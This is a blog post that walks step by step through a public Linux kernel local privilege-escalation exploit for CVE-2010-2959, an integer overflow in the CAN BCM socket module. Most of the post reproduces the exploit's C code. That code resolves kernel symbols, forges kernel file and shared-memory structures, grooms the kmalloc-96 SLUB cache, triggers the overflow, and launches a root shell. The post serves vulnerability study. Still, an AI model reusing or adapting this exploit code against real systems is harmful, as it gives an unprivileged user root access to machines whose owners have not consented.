xorl %eax, %eax

CVE-2010-2959: Linux kernel Controller Area Network Integer Overflow

leave a comment »

This vulnerability was reported some time ago by Ben Hawkes who also wrote a blog post that explains his finding. Since hawkes has already discussed the vulnerability in his excellent post, I’ll move on and discuss the exploitation process based on Jon Oberheide‘s released code “i-can-haz-modharden.c“.
Let’s have a look at Jon Oberheide’s code now…

main(int argc, char **argv)
    return 0;

So, this is how we’ll discuss the functions of his exploit code. First of all, let’s move to setup() and see what’s going on there.

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
_commit_creds commit_creds;
    printf("[+] looking for symbols...\n");
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] symbol table not availabe, aborting!\n");

Using GCC’s attribute regparm it forces the application to use registers to store the specified arguments. Next, inside setup() we see a call to get_symbol() which is simple parsing routine that uses either /proc/kallsyms or /proc/ksyms to retrieve the requested symbol’s address like this:

unsigned long
get_symbol(char *name)
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret = 0, oldstyle;
    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            return 0;
        oldstyle = 1;
    while (ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
        } else {
            ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
                p = strrchr(sname, '_');
                if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_') {
                    *p = '\0';
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
        if (!strcmp(name, sname)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            return addr;
    return 0;

So, the setup() has hopefully retrieved the ‘commit_creds’ address which is a kernel API routine used to install new credentials to the current task. Next, setup() will execute the following code:

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_prepare_kernel_cred prepare_kernel_cred;
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] symbol table not availabe, aborting!\n");
    printf("[+] setting up exploit payload...\n");

Similarly, he attempts to retrieve prepare_kernel_cred() address. This kernel function is used to prepare a set of credentials for a kernel service. Continuing with the code we see this:

struct super_block {
    struct list_head s_list;
    unsigned int s_dev;
    unsigned long s_blocksize;
    unsigned char s_blocksize_bits;
    unsigned char s_dirt;
    uint64_t s_maxbytes;
    void *s_type;
    void *s_op;
    void *dq_op;
    void *s_qcop;
    void *s_export_op;
    unsigned long s_flags;
} super_block;
    super_block.s_flags = 0;

The super block’s “flags” member is set to zero and the inode initialization takes place like this:

struct inode {
    struct list_head i_hash;
    struct list_head i_list;
    struct list_head i_sb_list;
    struct list_head i_dentry_list;
    unsigned long i_ino;
    unsigned int i_count;
    unsigned int i_nlink;
    unsigned int i_uid;
    unsigned int i_gid;
    unsigned int i_rdev;
    uint64_t i_version;
    uint64_t i_size;
    unsigned int i_size_seqcount;
    long i_atime_tv_sec;
    long i_atime_tv_nsec;
    long i_mtime_tv_sec;
    long i_mtime_tv_nsec;
    long i_ctime_tv_sec;
    long i_ctime_tv_nsec;
    uint64_t i_blocks;
    unsigned int i_blkbits;
    unsigned short i_bytes;
    unsigned short i_mode;
    unsigned int i_lock;
    struct mutex i_mutex;
    unsigned int i_alloc_sem_activity;
    unsigned int i_alloc_sem_wait_lock;
    struct list_head i_alloc_sem_wait_list;
    void *i_op;
    void *i_fop;
    struct super_block *i_sb;
    void *i_flock;
    void *i_mapping;
    char i_data[84];
    void *i_dquot_1;
    void *i_dquot_2;
    struct list_head i_devices;
    void *i_pipe_union;
    unsigned int i_generation;
    unsigned int i_fsnotify_mask;
    void *i_fsnotify_mark_entries;
    struct list_head inotify_watches;
    struct mutex inotify_mutex;
} inode;
    inode.i_size = 4096;
    inode.i_sb = &super_block;
    inode.inotify_watches.next = &inode.inotify_watches;
    inode.inotify_watches.prev = &inode.inotify_watches;
    inode.inotify_mutex.count = 1;

The inode’s size is set to 4096 which is the page size on 32-bit architectures and inode’s super-block is set to the address of ‘super_block’ structure. Finally, the inotify watches are initialized to point to inode’s watches and MUTEX lock’s counter is set to 1. The next code of setup() is the dentry level initialization code which is the following:

struct list_head {
    struct list_head *next;
    struct list_head *prev;
struct dentry {
    unsigned int d_count;
    unsigned int d_flags;
    unsigned int d_lock;
    int d_mounted;
    void *d_inode;
    struct list_head d_hash;
    void *d_parent;
} dentry;
    dentry.d_count = 4096;
    dentry.d_flags = 4096;
    dentry.d_parent = NULL;
    dentry.d_inode = &inode;

Nothing really notable in the dentry initialization code. Two file operations’ callback functions are initialized next like this:

struct file_operations {
    void *owner;
    void *llseek;
    void *read;
    void *write;
    void *aio_read;
    void *aio_write;
    void *readdir;
    void *poll;
    void *ioctl;
    void *unlocked_ioctl;
    void *compat_ioctl;
    void *mmap;
    void *open;
    void *flush;
    void *release;
    void *fsync;
    void *aio_fsync;
    void *fasync;
    void *lock;
    void *sendpage;
    void *get_unmapped_area;
    void *check_flags;
    void *flock;
    void *splice_write;
    void *splice_read;
    void *setlease;
} op;
    op.mmap = &kernel_code;
    op.get_unmapped_area = &kernel_code;

Both file operation ‘mmap’ and ‘get_unmapped_area’ which are used to map kernel memory and retrieve the unmapped area are set to point to userland function ‘kernel_code’. The latter routine contains the code below:

int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma)
    return -1;

Which is straightforward. It will update the credential set to that of 0 using exported kernel API routines prepare_kernel_cred() and commit_cred(). Back to setup() code we now have this:

struct vfsmount {
    struct list_head mnt_hash;
    void *mnt_parent;
    void *mnt_mountpoint;
    void *mnt_root;
    void *mnt_sb;
    struct list_head mnt_mounts;
    struct list_head mnt_child;
    int mnt_flags;
    const char *mnt_devname;
    struct list_head mnt_list;
    struct list_head mnt_expire;
    struct list_head mnt_share;
    struct list_head mnt_slave_list;
    struct list_head mnt_slave;
    struct vfsmount *mnt_master;
    struct mnt_namespace *mnt_ns;
    int mnt_id;
    int mnt_group_id;
    int mnt_count;
} vfsmount;
    vfsmount.mnt_flags = 0;
    vfsmount.mnt_count = 1;

That simply initializes the VFS mount structure’s counter and flags members. The next structure that will be initialized is the ‘file’ which is performed in setup() as you can see here:

struct file {
    struct list_head fu_list;
    struct vfsmount *f_vfsmnt;
    struct dentry *f_dentry;
    void *f_op;
    unsigned int f_lock;
    unsigned long f_count;
} file;
    file.fu_list.prev = &file.fu_list;
    file.fu_list.next = &file.fu_list;
    file.f_dentry = &dentry;
    file.f_vfsmnt = &vfsmount;
    file.f_op = &op;

The previous dentry, VFS mounts and file operations structures are used to initialized the ‘file’ structure as shown above. At last, setup() contains the code below:

struct kern_ipc_perm {
    unsigned int lock;
    int deleted;
    int id;
    unsigned int key;
    unsigned int uid;
    unsigned int gid;
    unsigned int cuid;
    unsigned int cgid;
    unsigned int mode;
    unsigned int seq;
    void *security;
struct shmid_kernel {
    struct kern_ipc_perm shm_perm;
    struct file *shm_file;
    unsigned long shm_nattch;
    unsigned long shm_segsz;
    time_t shm_atim;
    time_t shm_dtim;
    time_t shm_ctim;
    unsigned int shm_cprid;
    unsigned int shm_lprid;
    void *mlock_user;
} shmid_kernel;
    shmid_kernel.shm_perm.key = IPC_PRIVATE;
    shmid_kernel.shm_perm.uid = getuid();
    shmid_kernel.shm_perm.gid = getgid();
    shmid_kernel.shm_perm.cuid = getuid();
    shmid_kernel.shm_perm.cgid = getgid();
    shmid_kernel.shm_perm.mode = -1;
    shmid_kernel.shm_file = &file;

This is a shared memory structure that will be used in the kernel heap memory corruption. This was the preparation code and we can now move to the next, trigger() function which is more interesting…

#ifndef PF_CAN
#define PF_CAN 29
#ifndef CAN_BCM
#define CAN_BCM 2
struct sockaddr_can {
    sa_family_t can_family;
    int can_ifindex;
    union {
        struct { uint32_t rx_id, tx_id; } tp;
    } can_addr;

struct can_frame {
    uint32_t can_id;
    uint8_t can_dlc;
    uint8_t data[8] __attribute__((aligned(8)));
struct bcm_msg_head {
    uint32_t opcode;
    uint32_t flags;
    uint32_t count;
    struct timeval ival1, ival2;
    uint32_t can_id;
    uint32_t nframes;
    struct can_frame frames[0];
    int *shmids;
    int i, ret, sock, cnt, base, smashed;
    int diff, active, total, active_new, total_new;
    int len, sock_len, mmap_len;
    struct sockaddr_can addr;
    struct bcm_msg_head *msg;
    void *efault;
    char *buf;
    printf("[+] creating PF_CAN socket...\n");
    sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
    if (sock < 0) {
        printf("[-] kernel lacks CAN packet family support\n");

Of course, it’ll first attempt to create a ‘PF_CAN’ socket with ‘CAN_BCM’ option since this module provides some desirable properties for kernel heap exploitation as Jon Oberheide states in his comments. If the socket family exists, it will continue like this:

    printf("[+] connecting PF_CAN socket...\n");
    memset(&addr, 0, sizeof(addr));
    addr.can_family = PF_CAN;
    ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
    if (sock < 0) {
        printf("[-] could not connect CAN socket\n");

So, assuming that it connected successfully, it will continue executing trigger()’s code as shown below:

#define ALLOCATION 96
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
    len = MHSIZ + (CFSIZ * (ALLOCATION / 16));
    msg = malloc(len);
    memset(msg, 0, len);
    msg->can_id = 2959;
    msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;

It allocates some space using malloc(3), zeroes it out, setting ‘can_id’ to a value that will make bcm_find_op() return a NULL operation as Ben Hawkes described because it won’t find any operation with similar ID. Here is the bcm_find_op()’s code as seen at net/can/bcm.c:

static struct bcm_op *bcm_find_op(struct list_head *ops, canid_t can_id,
                                  int ifindex)
        struct bcm_op *op;

        list_for_each_entry(op, ops, list) {
                if ((op->can_id == can_id) && (op->ifindex == ifindex))
                        return op;

        return NULL;

At last, ‘msg->nframes’ is set a value that will trigger the integer overflow bcm_rx_setup() kmalloc() code that hawkes discovered. Here is the actual buggy code:

    if (msg_head->nframes > 1) {
       op->frames = kmalloc(
                      msg_head->nframes * CFSIZ,

So, because of the multiplication with ‘CFSIZ’ the result leads to a controlled integer overflow that will result in an invalid memory allocation of kmalloc(). Back to trigger() we now have this code:

#define RX_SETUP 5
#define RX_DELETE 6
    printf("[+] clearing out any active OPs via RX_DELETE...\n");
    msg->opcode = RX_DELETE;
    ret = send(sock, msg, len, 0);

This will set the message’s opcode to ‘RX_DELETE’ and then using send(2) it clears out any active operations. Now, it’s time for twiz’s shared memory hack…

    printf("[+] removing any active user-owned shmids...\n");
    system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");

This simple loop will retrieve each SHMID and using ipcrm(1) utility it will remove each one of them as long as it has the appropriate access to them. trigger() continues like this:

#define SLUB "kmalloc-96"
    printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n");
    diff = check_slabinfo(SLUB, &active, &total);

Since it is convenient for the exploitation of this vulnerability, “kmalloc-96” will be smashed. The check_slabinfo() routine is a simple code that utilizes /proc/slabinfo that retrieves the objects’ name, number of active objects and total number of objects and returns the difference between the total number of objects and the number of active objects. Here is its code:

check_slabinfo(char *cache, int *active_out, int *total_out)
    FILE *fp;
    char name[64], slab[256];
    int active, total, diff;
    memset(slab, 0, sizeof(slab));
    memset(name, 0, sizeof(name));
    fp = fopen("/proc/slabinfo", "r");
    if (!fp) {
        printf("[-] sorry, /proc/slabinfo is not available!");
    fgets(slab, sizeof(slab) - 1, fp);
    while (1) {
        fgets(slab, sizeof(slab) - 1, fp);
        sscanf(slab, "%s %u %u", name, &active, &total);
        diff = total - active;
        if (strcmp(name, cache) == 0) {
    if (active_out) {
        *active_out = active;
    if (total_out) {
        *total_out = total;
    return diff;

Continuing with twiz’s SHMEM magic, dummy allocations are performed…

    shmids = malloc(sizeof(int) * diff * 10);
    cnt = diff * 10;
    for (i = 0; i < cnt; ++i) {
        diff = check_slabinfo(SLUB, &active, &total);
        if (diff == 0) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
    base = i;

    if (diff != 0) {
        printf("[-] inconsistency detected with SLUB cache allocation, please try again\n");

Hopfully, this code will find the ideal base number that could be used to perform a contorlled heap memory corruption. However, if the right difference (which is 0 for total minus active number of objects) isn’t found it will return an error and exit. Otherwise, it will continue with trigger()’s code.

#define FILLER 100
    printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n");
    i = base;
    cnt = i + FILLER;
    for (; i < cnt; ++i) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);

It will allocate shared memory segments using shmget(2) using the previously calculated base index value. And it will perform the actual trigger of the bug here:

    msg->opcode = RX_SETUP;
    ret = send(sock, msg, len, 0);
    if (ret < 0) {
        printf("[-] kernel rejected malformed CAN header\n");

This will set the message’s opcode to that of the buggy function and then, it’ll attempt to send the malformed CAN header using send(2) system call. If the overflow occured it would have truncated memory after ‘i + FILLER’ so the following code is used to get those segments:

    i = base + FILLER;
    cnt = i + FILLER;
    for (; i < cnt; ++i) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);

To understand what happens in the following code we need to have a look at bcm_rx_setup()’s code and specifically in the following snippet:

                if (msg_head->nframes > op->nframes)
                        return -E2BIG;

                if (msg_head->nframes) {
                        /* update can_frames content */
                        err = memcpy_fromiovec((u8 *)op->frames,
                                               msg_head->nframes * CFSIZ);
                        if (err < 0)
                                return err;

                        /* clear last_frames to indicate 'nothing received' */
                        memset(op->last_frames, 0, msg_head->nframes * CFSIZ);

The first check is bypassed since ‘op->nframes’ is larger than ‘msg_head->nframes’ but the problem apears inside the second ‘if’ clause. The memcpy_fromiovec() call will result in the actual memory corruption but in this case, exactly after this call is a memset(3) invocation that zeroes out ‘op->last_frames’ which in this case is almost certainly an overflowed segment of memory and it also uses the malformed length of ‘msg_head->nframes * CFSIZ’. This will turn the entire SMHID controlled smash to zeroes.
To overcome this, Jon Oberheide did the following (in his own words):

To work around this, we take advantage of the fact that copy_from_user can
perform partial writes on x86 and trigger an EFAULT by setting up a
truncated memory mapping as the source for the memcpy_fromiovec operation,
allowing us to smash the necessary amount of memory and then pop out and
return early before the memset operation occurs.

Back to trigger() we have:

    printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n");
    mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
    sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
    efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault);

Which maps the previously discussed “truncated” memory segment to later trigger the EFAULT of memcpy_fromiovec() before memset(3) occurs. The exploitation code will then attempt to smash the adjacent memory in order to create a controlled SLUB overflow like this:

    printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n");
    msg = (struct bcm_msg_head *) efault;
    memset(msg, 0, mmap_len);
    msg->can_id = 2959;
    msg->nframes = (ALLOCATION / 16) * 4;
    msg->opcode = RX_SETUP;
    ret = send(sock, msg, mmap_len, 0);
    if (ret != -1 && errno != EFAULT) {
        printf("[-] couldn't trigger EFAULT, exploit aborting!\n");

This is a dummy attempt in order to check if the EFAULT is triggered successfully. Then, it follows a nice scan code.

#define EIDRM 43
    printf("[+] seeking out the smashed shmid_kernel...\n");
    i = base;
    cnt = i + FILLER + FILLER;
    for (; i < cnt; ++i) {
        ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
        if (ret == -1 && errno == EIDRM) {
            smashed = i;
    if (i == cnt) {
        printf("[-] could not find smashed shmid, trying running the exploit again!\n");
    printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]);

This loop checks each shared memory segment to find the smashed one. To do this it attempts to attach (as read-only) each shared memory segment using shmat(2) system call. However, if the latter system call returns with an error (aka. return value equals -1) and the “errno” global variable is set to “EIDRM” (Error Identifier Removed) it means that this was the smashed memory. So, it stores that index value to ‘i’ and continues with the exploitation.

#define IPCMNI 32768
    printf("[+] re-smashing the shmid_kernel with exploit payload...\n");
    shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;
    buf = (char *) msg;
    memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));

It sets ‘shmid_kernel.shm_perm.seq’ to point to the location of SLUB smash and then copies that at the end of the buffer that will be copied to kernel space space.

    msg->opcode = RX_SETUP;
    ret = send(sock, msg, mmap_len, 0);
    if (ret != -1 && errno != EFAULT) {
        printf("[-] couldn't trigger EFAULT, exploit aborting!\n");

This is a simple trigger of the vulnerability and then…

    ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
    if (ret == -1 && errno != EIDRM) {
        setresuid(0, 0, 0);
        setresgid(0, 0, 0);
        printf("[+] launching root shell!\n");
        execl("/bin/bash", "/bin/bash", NULL);
    printf("[-] exploit failed! retry?\n");

It will attempt to access the smashed memory segment and if the error code isn’t EIDRM which means that the identifier wasn’t removed, the exploit would probably have succeeded and file operation mmap() or get_unmapped_area() would have been called and thus gave root access to our task. So, it updates the real, effective, saved, user and group IDs to 0 and launches a root shell.

Written by xorl

October 4, 2010 at 15:30

Posted in bugs, linux

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s